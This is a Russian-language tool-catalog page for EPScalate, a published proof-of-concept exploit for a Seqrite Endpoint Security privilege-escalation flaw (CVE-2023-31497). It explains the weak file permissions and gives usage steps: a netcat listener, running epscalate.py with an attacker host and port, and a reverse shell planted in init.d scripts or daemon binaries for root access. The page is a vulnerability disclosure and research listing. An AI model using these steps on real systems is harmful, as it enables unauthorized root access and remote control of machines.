Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
EPScalate — Эксплойт для уязвимости повышения привилегий в QuickHeal Seqrite EPS (CVE-2023-31497). | Kitploit
Инструменты/GitHubGitHub/0xinfection/epscalate
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на Проникновение
GitHub0xinfection/epscalate

EPScalate

Эксплойт для уязвимости повышения привилегий в QuickHeal Seqrite EPS (CVE-2023-31497).

Репозиторий
1922 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

EPScalate

Уязвимость повышения привилегий в решении Seqrite Enterprise Endpoint Security (EPS) от QuickHeal. Уязвимости присвоен идентификатор CVE-2023-31497.

https://user-images.githubusercontent.com/39941993/230790056-87157751-b96c-49a6-81df-bf3126acfbd6.mp4

Сведения о поставщике и продукте

  • Поставщик: Quick Heal Technologies Limited
  • Продукт: Seqrite Endpoint Security (EPS)
  • Домашняя страница продукта: https://www.seqrite.com/endpoint-security/seqrite-endpoint-security
  • Затронутые версии: Все версии до v8.0.

Сведения об уязвимости

Seqrite Endpoint Security при установке по умолчанию размещается в каталоге /usr/lib/Seqrite/ с очень слабыми правами доступа к каталогам и файлам, предоставляя локальному пользователю полные права на чтение и запись содержимого каталога. Кроме того, процедура установки размещает скрипты запуска в /etc/init.d/, которые доступны для записи всем пользователям. Это позволяет любому непривилегированному пользователю системы повысить привилегии до root.

Эксплойт использует две различные уязвимости, вносимые программным обеспечением, для повышения привилегий в системе. Во-первых, приложение использует скрипты в /etc/init.d/ для запуска процессов сканирования, которые могут быть изменены любым пользователем. Во-вторых, приложение использует разделяемые объекты для динамической загрузки позиционно-независимого кода (PIC) во время выполнения. Фактически все исполняемые файлы разделяемых объектов доступны для записи всем пользователям. Наконец, двоичные файлы приложения, используемые для демона, также доступны для записи всем пользователям, что означает, что любой непривилегированный пользователь может перезаписать двоичные файлы сканера двоичным файлом обратной оболочки для выполнения произвольного кода от имени root.

Использование эксплойта

Эксплойт представляет собой простой файл Python, который помогает эксплуатировать уязвимость.

Шаги:

  1. На машине атакующего запустите слушатель с помощью netcat (nc -lvp <port>) или metasploit (multi/handler).
  2. Скопируйте или загрузите файлы epscalate.py и shellcode.c на целевую систему.
  3. Запустите файл Python с соответствующими аргументами (python3 epscalate.py -H 192.168.0.103:9999 -I).
  4. Дождитесь перезагрузки антивируса или перезагрузки системы.
  5. Обратное подключение к вашему слушателю подтвердит выполнение кода от имени root.

Справка эксплойта:

root@kitploit:~
$ python epscalate.py -h

    EPSCALATE - PoC for privesc in Seqrite EPS
                ~ 0xInfection

usage: epscalate.py -H <host>:<port> <technique_flag>

options:
  -h, --help            show this help message and exit
  -H HOSTPORT, --hostport HOSTPORT
                        The IP and port of the listening attacker machine in format of <ip>:<port>
  -B, --daemon-binaries
                        Overwrite the main daemon binaries to escalate privileges.
  -I, --initd-scripts   Posion /etc/init.d/ bash startup scripts with a reverse shell to escalate privileges.

Поддержка

Эксплойт протестирован на всех вариантах операционных систем на базе Debian и Ubuntu.

Лицензия и благодарности

Код эксплойта опубликован под лицензией Apache 2.0. Уязвимость была раскрыта поставщику и устранена на момент публикации.

Автор уязвимости и эксплойта: Пинаки Мондал (0xInfection).

Скачать инструмент